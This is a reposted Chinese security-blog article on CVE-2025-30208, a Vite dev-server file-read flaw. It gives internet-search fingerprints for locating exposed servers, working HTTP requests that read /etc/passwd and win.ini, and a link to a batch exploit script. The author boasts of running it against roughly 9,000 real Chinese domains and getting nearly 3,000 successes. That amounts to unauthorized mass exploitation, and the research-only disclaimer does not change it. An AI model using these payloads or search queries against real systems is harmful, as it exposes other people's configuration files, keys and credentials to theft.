CVE-2025-30208 附POC+批量检测脚本

admin 2025年3月30日23:03:01评论52 views字数 1284阅读4分16秒阅读模式

前言

这个CVE-2025-30208资产真的巨多,而且出货量也高。

几天前的晚上,我就全部跑了一遍了,导出了12635条中国域名资产,总共大概跑了9000多条,出了大概快3000了,出货量很高,详情请看下文

CVE-2025-30208 附POC+批量检测脚本

 

漏洞信息

CVE-2025-30208是Vite开发服务器中存在的一个高危逻辑漏洞,允许攻击者通过构造特殊的URL绕过文件访问限制,读取服务器上的任意文件(如配置文件、密钥、数据库凭据等)。该漏洞的利用条件需满足两点:开发服务器通过--host或server.host配置暴露至网络(非默认配置),且使用受影响版本的Vite由于Vite广泛应用于Vue、React等主流前端框架,潜在影响范围涉及数十万级资产。

漏洞原理

漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(**如?raw??或?import&raw??**)时,Vite对URL尾部分隔符(如?和&)的正则匹配不严格,导致安全检查被绕过。例如,攻击者可构造类似/@fs/etc/passwd?raw??的请求,利用@fs机制(本用于访问项目允许列表内的文件)读取系统敏感文件官方修复方案通过正则表达式/[?&]+$/移除URL末尾的冗余分隔符,从而阻断绕过路径。

漏洞POC

漏洞特征

fofa&&quake

  1. body="/@vite/client"

鹰图Hunter

  1. web.body="/@vite/client"

影响范围

  • 6.2.0 <= Vite <= 6.2.2
  • 6.1.0 <= Vite <= 6.1.1
  • 6.0.0 <= Vite <= 6.0.11
  • 5.0.0 <= Vite <= 5.4.14
  • Vite <= 4.5.9

POC

Linux下

  1. GET /@fs/etc/passwd?import&raw?? HTTP/1.1
  2. Host: xx.xx.xx.xx
  3. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
  4. Accept: */*
  5. Connection: Keep-Alive
CVE-2025-30208 附POC+批量检测脚本

window下

  1. GET /@fs/C://windows/win.ini?import&raw?? HTTP/1.1
  2. Host: xx.xx.xx.xx
  3. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
  4. Accept: */*
  5. Connection: Keep-Alive
CVE-2025-30208 附POC+批量检测脚本

注意再进行关键字搜索:以Linux举例

  1. The server is configured with a public base URL of

有一些非常有好的提示,告诉我们路径错了,应该安装它这样CVE-2025-30208 附POC+批量检测脚本注意在进行指定https搜索

  1. plain HTTP request
CVE-2025-30208 附POC+批量检测脚本

总共大概跑了9000多条,出了大概快3000了,出货量很高,不过修的也是真的快,估计修了一半多了

批量检测脚本

项目地址

  1. https://github.com/ThumpBo/CVE-2025-30208-EXP

 

原文始发于微信公众号(泷羽Sec-尘宇安全):CVE-2025-30208,资产巨多(中国域名资产:12635+),附POC+批量检测脚本

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月30日23:03:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2025-30208 附POC+批量检测脚本https://cn-sec.com/archives/3897265.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息